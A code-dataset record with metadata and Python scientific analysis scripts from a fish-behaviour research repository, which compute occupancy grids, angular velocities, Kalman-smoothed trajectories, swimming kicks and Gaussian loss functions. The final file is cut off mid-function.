"alpha_fraction": 0.4839712679386139,
"alphanum_fraction": 0.5021979212760925,
"avg_line_length": 34.735633850097656,
"blob_id": "747bee64556338766226a42bd1321da417abc142",
"content_id": "36c91e2fb10823da53ff62f0bc1d7edaaa8e9ae8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9327,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 261,
"path": "/find/plots/spatial/grid_occupancy.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport glob\nimport argparse\nimport numpy as np\n\nfrom find.plots.common import *\n\nimport matplotlib\nimport scipy.stats as st\nfrom scipy.ndimage.filters import gaussian_filter\n\n\ndef construct_grid(data, type, args, sigma=5.0):\n y, x = np.meshgrid(np.linspace(args.center[0] - (args.radius + 0.01),\n args.center[0] + (args.radius + 0.01), args.grid_bins),\n np.linspace(args.center[1] - (args.radius + 0.01),\n args.center[1] + (args.radius + 0.01), args.grid_bins))\n z = np.zeros([args.grid_bins, args.grid_bins])\n\n total_steps = 0\n for traj in data[type]:\n tsteps = traj.shape[0]\n total_steps += tsteps\n individuals = traj.shape[1] // 2\n idcs = range(individuals)\n\n for i in range(tsteps):\n for j in idcs:\n traj_x = traj[i, j * 2]\n traj_y = traj[i, j * 2 + 1]\n dist_x = np.abs(np.array(traj_x - x[:, 0]))\n dist_y = np.abs(np.array(traj_y - y[0, :]))\n min_xidx = np.argmin(dist_x)\n min_yidx = np.argmin(dist_y)\n z[min_xidx, min_yidx] += 1\n z /= (data[type][0].shape[1] // 2) * total_steps\n z *= 100\n\n if type == 'Real' or type == 'Hybrid':\n # here there is a stationary instance which seems to be a data issue\n # we smooth approximately 0.07% instances that are abnormally big (perhaps tracking error)\n z[z > 0.0045] = np.mean(z)\n print('Occupancy grid computed for type: {}'.format(type))\n\n if args.grid_smooth:\n z = gaussian_filter(z, sigma=sigma)\n\n return x, y, z\n\n\ndef occupancy_grid(data, grid, fig, type, ax, args, draw_colorbar=True, pad=0.1):\n x, y, z = grid['x'], grid['y'], grid['z']\n\n cutoff_val = args.grid_cutoff_val\n if cutoff_val < 0:\n step = 0.0005\n cutoff = list(np.arange(step, np.max(z) + step / 2, step))\n cutoff_val = step\n for i in range(len(cutoff)):\n c = cutoff[i]\n if np.sum(np.array(z > c)) / np.size(z) > args.grid_cutoff_thres:\n if i+1 < len(cutoff):\n cutoff_val = cutoff[i+1]\n else:\n cutoff_val = cutoff[i]\n lb, ub = np.min(z), cutoff_val\n\n # we need a custom palette for this plot\n # palette = sns.color_palette('viridis', args.grid_bins * args.grid_bins)\n # cmap = ListedColormap(palette.as_hex())\n cmap = matplotlib.cm.get_cmap('jet')\n\n c = ax.pcolormesh(x, y, z, cmap=cmap, shading='auto',\n vmin=lb, vmax=ub, alpha=1.0)\n\n if draw_colorbar:\n fig.colorbar(c, ax=ax, label='Cell occupancy (%)',\n location='left', pad=pad, extend='max')\n\n ax.set_yticks(np.arange(-args.radius,\n args.radius + 0.001, args.radius / 2))\n ax.set_xticks(np.arange(-args.radius,\n args.radius + 0.001, args.radius / 2))\n ax.set_xlim([-(args.radius * 1.05), args.radius * 1.05])\n ax.set_ylim([-(args.radius * 1.05), args.radius * 1.05])\n ax.set_title(type)\n\n outer = plt.Circle((0, 0), args.radius * 1.0005,\n color='white', fill=False)\n ax.add_artist(outer)\n ax.set_aspect('equal', 'box')\n\n return ax, c\n\n\ndef grid_difference(grids, type1, type2, fig, ax, args, draw_colorbar=True, pad=0.1):\n cmap = matplotlib.cm.get_cmap('jet')\n\n r_x = grids[type1]['x']\n r_y = grids[type1]['y']\n r_z = grids[type1]['z']\n z_diff = r_z - grids[type2]['z']\n\n vmax = args.grid_cutoff_val\n if vmax < 0:\n vmax = np.max(z_diff)\n\n c = ax.pcolormesh(r_x, r_y, np.abs(z_diff), cmap=cmap, shading='auto',\n vmin=0,\n vmax=vmax, alpha=1.0\n )\n\n if draw_colorbar:\n fig.colorbar(c, ax=ax, label='Cell occupancy (%)',\n location='left', pad=pad, extend='max')\n\n ax.set_yticks(np.arange(-args.radius,\n args.radius + 0.001, args.radius / 2))\n ax.set_xticks(np.arange(-args.radius,\n args.radius + 0.001, args.radius / 2))\n ax.set_xlim([-(args.radius * 1.05), args.radius * 1.05])\n ax.set_ylim([-(args.radius * 1.05), args.radius * 1.05])\n\n if type1 == 'Virtual (Toulouse)':\n type1 = 'ABC'\n if type2 == 'Virtual (Toulouse)':\n type2 = 'ABC'\n \n if type1 == 'Virtual':\n type1 = 'HR-NNig'\n if type2 == 'Virtual':\n type2 = 'HR-NNig'\n\n if type1 == 'Real':\n type1 = 'CD'\n if type2 == 'Real':\n type2 = 'CD'\n\n ax.set_title('|{} - {}|'.format(type1, type2))\n\n outer = plt.Circle((0, 0), args.radius * 1.0005,\n color='white', fill=False)\n ax.add_artist(outer)\n ax.set_aspect('equal', 'box')\n\n return ax, c\n\n\ndef plot(exp_files, path, args):\n grids = {}\n for k, v in exp_files.items():\n data = {}\n data[k] = []\n files = glob.glob(args.path + '/' + v)\n for f in files:\n data[k].append(np.loadtxt(f) * args.radius)\n print('Done loading data for type: {}'.format(k))\n\n x, y, z = construct_grid(data, k, args)\n grid = {'x': x, 'y': y, 'z': z}\n grids[k] = grid\n\n fig = plt.figure(figsize=(6, 5))\n ax = plt.gca()\n ax, _ = occupancy_grid(data, grid, fig, k, ax, args, pad=0.13)\n plt.grid(linestyle='dotted')\n plt.tight_layout()\n plt.savefig(path + '/occupancy_{}.png'.format(k), bbox_inches='tight')\n plt.close()\n\n if 'Real' not in grids.keys() and ('Hybrid' not in grids.keys() or 'Virtual' not in grids.keys()):\n import warnings\n warnings.warn('Skipping grid difference plots')\n return\n else:\n fig = plt.figure(figsize=(6, 5))\n ax = plt.gca()\n ax, _ = grid_difference(\n grids, 'Real', 'Virtual', fig, ax, args, pad=0.135)\n plt.tight_layout()\n plt.savefig(\n path + '/occupancy_diff_{}-{}.png'.format('Real', 'Virtual'), bbox_inches='tight')\n plt.close()\n\n fig = plt.figure(figsize=(6, 5))\n ax = plt.gca()\n ax, _ = grid_difference(\n grids, 'Real', 'Hybrid', fig, ax, args, pad=0.135)\n plt.tight_layout()\n plt.savefig(path + '/occupancy_diff_{}-{}.png'.format('Real',\n 'Hybrid'), bbox_inches='tight')\n plt.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Visualize the positions')\n parser.add_argument('--positions', '-p', type=str,\n help='Path to the trajectory file',\n required=True)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n parser.add_argument('--radius',\n type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--grid_bins',\n type=int,\n help='Number of bins for the occupancy grid plot',\n default=208,\n required=False)\n parser.add_argument('--center',\n type=float,\n nargs='+',\n help='The centroidal coordinates for the setups used',\n default=[0.0, 0.0],\n required=False)\n parser.add_argument('--grid_smooth',\n action='store_true',\n help='Smooth the grid for visual reasons if true',\n default=False,\n required=False)\n parser.add_argument('--grid_cutoff_thres',\n type=float,\n help='Cutoff point threshold for the percentage of points that are allowed to be removed to not squash the grid drawing colours',\n default=0.05,\n required=False)\n parser.add_argument('--grid_cutoff_val',\n type=float,\n help='Force the cutoff value of the grid for consistency (overrides grid_cutoff_thres)',\n default=-1,\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.4967551529407501,
"alphanum_fraction": 0.5038347840309143,
"avg_line_length": 35.45161437988281,
"blob_id": "d78ecc494676889a81db4fbb2e33bd93765ac566",
"content_id": "83adb4035f8b3ce69be4ff2975b606a4ba10ec05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3390,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 93,
"path": "/find/plots/spatial/angular_velocity.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.plots.common import *\nfrom find.utils.features import Velocities\nfrom find.utils.utils import angle_to_pipi\n\n\ndef plot(exp_files, path, args):\n ccycler = uni_cycler()\n linecycler = uni_linecycler()\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = []\n for p in pos:\n matrix = np.loadtxt(p) * args.radius\n matrix = Velocities([matrix], args.timestep).get()[0]\n for i in range(matrix.shape[1] // 2):\n angles = np.arctan2(matrix[:, i * 2 + 1], matrix[:, i * 2])\n data[e].append(angles)\n\n labels = []\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n for i, k in enumerate(sorted(data.keys())):\n vectors = data[k]\n labels.append(k)\n cvector = []\n for v in vectors:\n phis = v[1:]\n phis_tm1 = v[:-1]\n phis = list(map(angle_to_pipi, phis - phis_tm1))\n cvector += phis\n cvector = list(map(lambda x: x * 180 / np.pi, cvector))\n sns.kdeplot(cvector, ax=ax,\n color=next(ccycler), linestyle=next(linecycler), linewidth=uni_linewidth, label=k, gridsize=args.kde_gridsize)\n\n ax.set_xlabel('Angular change between successive timesteps (degrees)')\n ax.set_ylabel('PDF')\n ax.legend()\n plt.savefig(path + 'angular_velocity.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Angular velocity histogram figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--timestep', '-t', type=float,\n help='Timestep',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--kde_gridsize',\n type=int,\n help='Grid size for kernel density estimation plots',\n default=1500,\n required=False)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.5587378740310669,
"alphanum_fraction": 0.563592255115509,
"avg_line_length": 35.140350341796875,
"blob_id": "6f477f8be689580a49549d1361b903edd0073d58",
"content_id": "f234bcadd7c95afa9a71e35c047700d54d9bc0fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2060,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 57,
"path": "/find/smoothing/kf_smooth.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport argparse\nimport glob\nimport numpy as np\nfrom pykalman import KalmanFilter\n\nfrom find.utils.features import Velocities\nfrom find.utils.utils import ExperimentInfo, Center, Normalize\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Smoothing for the fish trajectories')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--fps', type=int,\n help='Camera framerate',\n required=True)\n parser.add_argument('--centroids', '-c', type=int,\n help='Frames to use in order to compute the centroidal positions',\n required=True)\n parser.add_argument('--center', action='store_true',\n help='Center smoothed data')\n parser.add_argument('--norm', action='store_true',\n help='Normalize smoothed data')\n args = parser.parse_args()\n\n timestep = args.centroids / args.fps\n\n files = glob.glob(args.path + '/*processed_positions.dat')\n data = []\n for f in files:\n positions = np.loadtxt(f)\n\n mus = []\n for i in range(positions.shape[1] // 2):\n kf = KalmanFilter(n_dim_state=2, n_dim_obs=2)\n mu, sigma = kf.filter(positions[:, i * 2:i * 2 + 2])\n if len(mus) == 0:\n mus = np.array(mu)\n else:\n mus = np.append(mus, np.array(mu))\n data.append(mus)\n\n info = ExperimentInfo(data)\n if args.center:\n data, info = Center(data, info).get()\n if args.norm:\n data, info = Normalize(data, info).get()\n velocities = Velocities(data, timestep).get()\n\n for i in range(len(data)):\n f = files[i]\n new_f = f.replace('positions.dat', 'positions_filtered.dat', 1)\n np.savetxt(new_f, data[i])\n new_f = f.replace('positions.dat', 'velocities_filtered.dat', 1)\n np.savetxt(new_f, velocities[i])\n"
},
{
"alpha_fraction": 0.595174252986908,
"alphanum_fraction": 0.6066641211509705,
"avg_line_length": 43.25423812866211,
"blob_id": "4c5bf1683e51b52cf17ad3694beea74fa51d40b9",
"content_id": "736ee7ee3494a21f9e9eb6e4945309123395e79e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2611,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 59,
"path": "/find/utils/detect_kicks.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport argparse\nimport glob\n\nimport numpy as np\nimport scipy.signal as signal\n\n\"\"\"\n:brief: This script will take as input fish trajectory and the corresponding velocities and then detect\n the kicks that the fish performed. We define this kick as the acceleration and deceleration phase \n between to valleys of the signal.\n\"\"\"\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Preprocess fish trajectories')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n args = parser.parse_args()\n\n files = glob.glob(args.path + '/*processed_positions_filtered.dat')\n\n all_features = np.empty(shape=[0, 3])\n for f in files:\n positions = np.loadtxt(f)\n velocities = np.loadtxt(f.replace('positions', 'velocities'))\n\n # we compute the resultant velocities for this 2D problem\n rvelocities = []\n for i in range(velocities.shape[0]):\n r = np.sqrt(velocities[i, 1] ** 2 +\n velocities[i, 0] ** 2 -\n 2 * np.abs(velocities[i, 1]) * np.abs(velocities[i, 0]) * np.cos(\n np.arctan2(velocities[i, 1], velocities[i, 0])))\n rvelocities.append(r)\n rvelocities = np.array(rvelocities)\n\n # the following code detects the valleys of the signal. Our kick is contained between successive valleys !\n valleys = signal.find_peaks_cwt(1 / rvelocities, np.arange(0.1, 0.3))\n\n # we go on to store the features of this analysis in a matrix that can be used later for analysis\n events = []\n features = []\n for i in range(len(valleys) - 1):\n event = [i, np.argmax(rvelocities[valleys[i]:valleys[i + 1] + 1]), valleys[i], valleys[i + 1]]\n events.append(event)\n\n peak_vel = rvelocities[event[1]]\n length = valleys[i + 1] - valleys[i] + 1\n mean = np.mean(rvelocities[valleys[i]:valleys[i + 1] + 1])\n features.append([peak_vel, length, mean])\n all_features = np.append(all_features, np.array(features), axis=0)\n np.savetxt(f.replace('positions', 'kicks'), events)\n np.savetxt(f.replace('positions', 'kicks_features'), features)\n\n np.savetxt(args.path + '/all_kick_features.dat', all_features)\n for n in range(all_features.shape[1]):\n all_features[:, n] = (all_features[:, n] - np.mean(all_features[:, n])) / np.std(all_features[:, n])\n np.savetxt(args.path + '/standardized_kick_features.dat', all_features)\n"
},
{
"alpha_fraction": 0.5957246422767639,
"alphanum_fraction": 0.6133291125297546,
"avg_line_length": 32.84042739868164,
"blob_id": "eac86123dcf7bf30e218cb3c15a750d311eb103b",
"content_id": "08d0696fb1ea57df835d04e532213247412f5bea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3181,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 94,
"path": "/find/models/tf_losses.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport tensorflow.keras.backend as K\n\n\ndef logbound(val, max_logvar=0.5, min_logvar=-10, backend=None):\n if backend is None:\n logsigma = max_logvar - np.log(np.exp(max_logvar - val) + 1)\n logsigma = min_logvar + np.log(np.exp(logsigma - min_logvar) + 1)\n elif backend == 'keras':\n logsigma = max_logvar - K.log(K.exp(max_logvar - val) + 1)\n logsigma = min_logvar + K.log(K.exp(logsigma - min_logvar) + 1)\n return logsigma\n\n\ndef gaussian_nll(y_true, y_pred):\n \"\"\"\n :brief: Gaussian negative log likelihood loss function for probabilistic network outputs.\n\n :param y_true: np.array of the values the network needs to predict\n :param y_pred: np.array of the values the network predicted\n :return: float\n \"\"\"\n\n n_dims = int(int(y_pred.shape[1]) / 2)\n mu = y_pred[:, :n_dims]\n logsigma = logbound(y_pred[:, n_dims:], 0, -10, backend='keras')\n \n mse = -0.5 * K.sum(K.square((y_true-mu) / K.exp(logsigma)), axis=1)\n sigma_trace = -K.sum(logsigma, axis=1)\n log2pi = -0.5 * n_dims * np.log(2 * np.pi)\n log_likelihood = mse + sigma_trace + log2pi\n return K.mean(-log_likelihood)\n\ndef multi_dim_gaussian_nll(y_true, y_pred):\n \"\"\"\n :brief: Gaussian negative log likelihood loss function for probabilistic network outputs.\n\n :param y_true: np.array of the values the network needs to predict\n :param y_pred: np.array of the values the network predicted\n :return: float\n \"\"\"\n\n means = []\n prediction_steps = y_pred.shape[2]\n for i in range(prediction_steps):\n n_dims = y_pred.shape[3] // 2\n mu = y_pred[:, 0, i, :n_dims]\n logsigma = logbound(y_pred[:, 0, i, n_dims:],\n 0.5, -10, backend='keras')\n\n # https://www.cs.cmu.edu/~epxing/Class/10701-08s/recitation/gaussian.pdf\n f = -0.5 * \\\n K.sum(K.square((y_true[:, 0, i, :] - mu) /\n (K.exp(logsigma) + 1e-8)), axis=1)\n sigma_trace = -K.sum(logsigma, axis=1)\n log2pi = -0.5 * n_dims * np.log(2 * np.pi)\n log_likelihood = f + sigma_trace + log2pi\n means.append(K.mean(-log_likelihood))\n\n return sum(means) / len(means)\n\n\ndef gaussian_mae(y_true, y_pred):\n \"\"\"\n :brief: Custom mean absolute error function for the Gaussian negative log likelihood function.\n\n :param y_true: np.array of the values the network needs to predict\n :param y_pred: np.array of the values the network predicted\n :return: float\n \"\"\"\n\n n_dims = y_pred.shape[1] // 2\n return K.mean(K.abs(y_pred[:, :n_dims] - y_true), axis=-1)\n\n\ndef gaussian_mse(y_true, y_pred):\n \"\"\"\n :brief: Custom mean squared error function for the Gaussian negative log likelihood function.\n\n :param y_true: np.array of the values the network needs to\n :param y_pred: np.array of the values the network predicted\n :return: float\n \"\"\"\n\n n_dims = y_pred.shape[1] // 2\n return K.mean(K.square(y_pred[:, :n_dims] - y_true), axis=-1)\n\n\nlosses = {\n 'gaussian_nll': gaussian_nll,\n 'gaussian_mse': gaussian_mse,\n 'gaussian_mae': gaussian_mae,\n 'multi_dim_gaussian_nll': multi_dim_gaussian_nll,\n}\n"
},
{
"alpha_fraction": 0.4070471227169037,
"alphanum_fraction": 0.42692455649375916,
"avg_line_length": 40.05345916748047,
"blob_id": "68d26e57c9346c715933c637b33940384052b2de",
"content_id": "3e3044514fa391957f86af8216c6ce004fc19209",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 26110,
"license_type": "no_license",
"max_line_length": 172,
"num_lines": 636,
"path": "/find/plots/spatial/future_trajectory_variance.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport os\nimport glob\nimport argparse\n\nfrom numpy.lib.function_base import angle\nfrom find.plots.spatial.relative_orientation import viewing_angle\n\nfrom find.utils.utils import angle_to_pipi\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\n\nimport matplotlib\nfrom scipy.interpolate import griddata\nimport scipy.stats as st\n\n\ndef gen_arrow_head_marker(angle):\n arr = np.array([[.1, .3], [.1, -.3], [1, 0]]) # arrow shape\n rot_mat = np.array([\n [np.cos(angle), np.sin(angle)],\n [-np.sin(angle), np.cos(angle)]\n ])\n arr = np.matmul(arr, rot_mat) # rotates the arrow\n x0 = np.amin(arr[:, 0])\n x1 = np.amax(arr[:, 0])\n y0 = np.amin(arr[:, 1])\n y1 = np.amax(arr[:, 1])\n scale = np.amax(np.abs([x0, x1, y0, y1]))\n arrow_head_marker = mpl.path.Path(arr)\n return arrow_head_marker, scale\n\n\ndef create_dirs(fullpath):\n if not os.path.exists(fullpath):\n os.makedirs(fullpath)\n\n\ndef compute_grid(data, args):\n grid = {}\n for k in sorted(data.keys()):\n grid[k] = {}\n skipped_count = 0\n total_count = 0\n\n trajectory_segments = []\n segment_len = args.observation_len + \\\n args.prediction_len + 1 # +1 for the starting point\n\n # generate grids\n r_grid = np.arange(0, args.radius + 0.001, args.radius_grid_res)\n idx_dict = {}\n for i in range(1, len(r_grid)):\n idx_dict[(r_grid[i-1], r_grid[i])] = {}\n idx_dict[(r_grid[i-1], r_grid[i])]['all'] = []\n\n a_grid = np.arange(0, 180 + 0.001, args.angle_grid_res)\n idist_grid = np.arange(0, args.radius + 0.001, args.interdist_grid_res)\n psi_grid = np.arange(0, 180 + 0.001, args.viewing_angle_grid_res)\n\n for e in range(len(data[k]['pos'])):\n p = data[k]['pos'][e]\n v = data[k]['vel'][e]\n idist = data[k]['dist'][e]\n dwall = data[k]['dist_to_wall'][e]\n\n total_count += 1\n if segment_len > p.shape[0]:\n skipped_count += 1\n continue # not enough samples to generate the plot\n\n # headings\n hdgs = np.empty((p.shape[0], 0))\n for i in range(p.shape[1] // 2):\n hdg = np.arctan2(v[:, i*2+1], v[:, i*2])\n hdgs = np.hstack((hdgs, hdg.reshape(-1, 1)))\n\n # angles to the wall\n angles_to_wall = np.empty((hdgs.shape[0], hdgs.shape[1]))\n for i in range(angles_to_wall.shape[1]):\n aw = hdgs[:, i] - \\\n np.arctan2(p[:, i*2+1], p[:, i*2])\n angles_to_wall[:, i] = list(map(angle_to_pipi, aw))\n\n # viewing angles\n angle_dif_focal = hdgs[:, 0] - \\\n np.arctan2(p[:, 3] - p[:, 1], p[:, 2] - p[:, 0])\n angle_dif_focal = list(map(angle_to_pipi, angle_dif_focal))\n\n angle_dif_neigh = hdgs[:, 1] - \\\n np.arctan2(p[:, 1] - p[:, 3], p[:, 0] - p[:, 2])\n angle_dif_neigh = list(map(angle_to_pipi, angle_dif_neigh))\n\n viewing_angles = np.array([angle_dif_focal, angle_dif_neigh]).T\n\n # complete matrix with info about the trajectories of the neighbouring fish\n matrix = np.hstack((p, v, angles_to_wall, dwall,\n idist.reshape(-1, 1), viewing_angles, hdgs))\n for i in range(matrix.shape[0]):\n if i + segment_len >= matrix.shape[0]:\n break\n\n # X1 Y1 X2 Y2 VX1 VY1 VX2 VY2 Th1 Th2 D1 D2 Idist Psi1 Psi2 Hdg1 Hdg2\n # 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16\n trajectory_segments.append(matrix[i:(i+segment_len), :])\n\n # --- generate grids\n\n # radii grid\n for ts_idx, ts in enumerate(trajectory_segments):\n for i in range(1, len(r_grid)):\n if r_grid[i-1] <= ts[args.observation_len, 10] and ts[args.observation_len, 10] < r_grid[i]:\n idx_dict[(r_grid[i-1], r_grid[i])\n ]['all'].append((ts_idx, 0))\n if r_grid[i-1] <= ts[args.observation_len, 11] and ts[args.observation_len, 11] < r_grid[i]:\n idx_dict[(r_grid[i-1], r_grid[i])\n ]['all'].append((ts_idx, 1))\n\n # radii and angle to the wall\n for dgrid, sub_dict in idx_dict.items():\n for idx in sub_dict['all']:\n for i in range(1, len(a_grid)):\n ts = trajectory_segments[idx[0]]\n\n if (a_grid[i-1], a_grid[i]) not in sub_dict.keys():\n idx_dict[dgrid][(a_grid[i-1], a_grid[i])] = {}\n # ! this could be moved to not create empty lists if there are no idcs in it\n idx_dict[dgrid][(a_grid[i-1], a_grid[i])]['all'] = []\n\n if a_grid[i-1] <= np.abs(ts[args.observation_len, 8 + idx[1]] * 180 / np.pi) and np.abs(ts[args.observation_len, 8 + idx[1]] * 180 / np.pi) < a_grid[i]:\n idx_dict[dgrid][(a_grid[i-1], a_grid[i])\n ]['all'].append(idx)\n\n # interindividual distance grid\n for dgrid, sub_dict1 in idx_dict.items():\n if dgrid == 'all':\n continue\n\n for agrid, sub_dict2 in sub_dict1.items():\n if agrid == 'all':\n continue\n\n for idx in sub_dict2['all']:\n for i in range(1, len(idist_grid)):\n ts = trajectory_segments[idx[0]]\n\n if (idist_grid[i-1], idist_grid[i]) not in sub_dict2.keys():\n idx_dict[dgrid][agrid][(\n idist_grid[i-1], idist_grid[i])] = {}\n # ! this could be moved to not create empty lists if there are no idcs in it\n idx_dict[dgrid][agrid][(\n idist_grid[i-1], idist_grid[i])]['all'] = []\n\n if idist_grid[i-1] <= ts[args.observation_len, 12] and ts[args.observation_len, 12] < idist_grid[i]:\n idx_dict[dgrid][agrid][(\n idist_grid[i-1], idist_grid[i])]['all'].append(idx)\n\n # viewing angle grid\n for dgrid, sub_dict1 in idx_dict.items():\n if dgrid == 'all':\n continue\n\n for agrid, sub_dict2 in sub_dict1.items():\n if agrid == 'all':\n continue\n\n for idist_grid, sub_dict3 in sub_dict2.items():\n if idist_grid == 'all':\n continue\n\n for idx in sub_dict3['all']:\n for i in range(1, len(psi_grid)):\n ts = trajectory_segments[idx[0]]\n\n focal = idx[1]\n if focal == 0:\n neigh = 1\n va_idx = 14 # we want the viewing angle of the neighbour to the focal\n else:\n neigh = 0\n va_idx = 13\n\n if (psi_grid[i-1], psi_grid[i]) not in sub_dict3.keys():\n idx_dict[dgrid][agrid][idist_grid][(\n psi_grid[i-1], psi_grid[i])] = {}\n # ! this could be moved to not create empty lists if there are no idcs in it\n idx_dict[dgrid][agrid][idist_grid][(\n psi_grid[i-1], psi_grid[i])]['all'] = []\n\n if psi_grid[i-1] <= ts[args.observation_len, va_idx] * 180 / np.pi and ts[args.observation_len, va_idx] * 180 / np.pi < psi_grid[i]:\n idx_dict[dgrid][agrid][idist_grid][(\n psi_grid[i-1], psi_grid[i])]['all'].append(idx)\n\n grid[k]['idx_grid'] = idx_dict\n grid[k]['seg'] = trajectory_segments\n print('{} skipped: {} / {} experiment files'.format(k,\n skipped_count, total_count))\n return grid\n\n\ndef plot_future_trajectory_variance(cell_segments, path, type, ax, args):\n if len(cell_segments) == 0:\n return\n\n distributions = {}\n\n xy = np.empty((0, 2))\n for i in range(len(cell_segments)):\n xy = np.vstack([xy, cell_segments[i]])\n\n cmap = matplotlib.cm.get_cmap('jet')\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n\n xx, yy = np.mgrid[-0.3:0.3:250j, -0.3:0.3:250j]\n kernel = st.gaussian_kde(xy.T)\n grid_pos = np.vstack([xx.ravel(), yy.ravel()])\n f = np.reshape(kernel(grid_pos).T, xx.shape)\n ax.contourf(xx, yy, f, levels=100, cmap=cmap)\n\n np.savetxt(path + '/xx_{}.dat'.format(type), xx)\n np.savetxt(path + '/yy_{}.dat'.format(type), yy)\n np.savetxt(path + '/f_{}.dat'.format(type), f)\n\n outer = plt.Circle(\n (0, 0), 0.25, color='k', fill=False)\n ax.add_artist(outer)\n ax.set_xlim([-0.3, 0.3])\n ax.set_ylim([-0.3, 0.3])\n plt.savefig(path + '/trajectory_variance_type_{}.png'.format(type))\n plt.close()\n\n\ndef plot_grids(data, path, ax, args):\n grid = compute_grid(data, args)\n\n lines = ['-', '--', ':']\n linecycler = cycle(lines)\n new_palette = uni_palette()\n ccycler = cycle(sns.color_palette(new_palette))\n\n for k in sorted(grid.keys()):\n if k == 'Hybrid':\n lines = [':']\n linecycler = cycle(lines)\n elif k == 'Virtual':\n lines = ['--']\n linecycler = cycle(lines)\n elif k == 'Real':\n lines = ['-']\n linecycler = cycle(lines)\n\n idx_dict = grid[k]['idx_grid']\n segments = grid[k]['seg']\n\n # plot distance barplots\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n\n cell_range = []\n count = []\n for dgrid, sub_dict1 in idx_dict.items():\n if dgrid == 'all':\n continue\n\n lb = '{:.3f}'.format(round(dgrid[0], 3))\n ub = '{:.3f}'.format(round(dgrid[1], 3))\n cell_range.append('[{}, {}]'.format(lb, ub))\n count.append(len(sub_dict1['all']))\n\n sns.barplot(x=cell_range, y=count, ax=ax, color=next(ccycler))\n ax.set_xlabel('Radius range (m)')\n ax.set_ylabel('Number of trajectories')\n ax.set_title(k)\n plt.xticks(rotation=45)\n plt.tight_layout()\n plt.savefig(\n path + 'dist_step_{}__type_{}.png'.format(args.radius_grid_res, k))\n plt.close()\n print('Distance plots: done')\n\n # plot angles to the wall barplots\n for dgrid, sub_dict1 in idx_dict.items():\n if dgrid == 'all':\n continue\n\n cell_range = []\n angles_rad = []\n count = []\n\n for agrid, sub_dict2 in sub_dict1.items():\n if agrid == 'all':\n continue\n\n cell_range.append('[{}, {}]'.format(agrid[0], agrid[1]))\n angles_rad.append(agrid[1] * np.pi / 180.)\n count.append(len(sub_dict2['all']))\n\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n ccycler = cycle(sns.color_palette(new_palette))\n\n ax = plt.subplot(projection='polar')\n ax.set_thetamin(0)\n ax.set_thetamax(180)\n\n if len(count):\n ax.bar(angles_rad, count, width=args.angle_grid_res *\n np.pi / 180., bottom=0.0, color=next(ccycler), alpha=1.0)\n ax.set_xlabel('Radius range (m)')\n 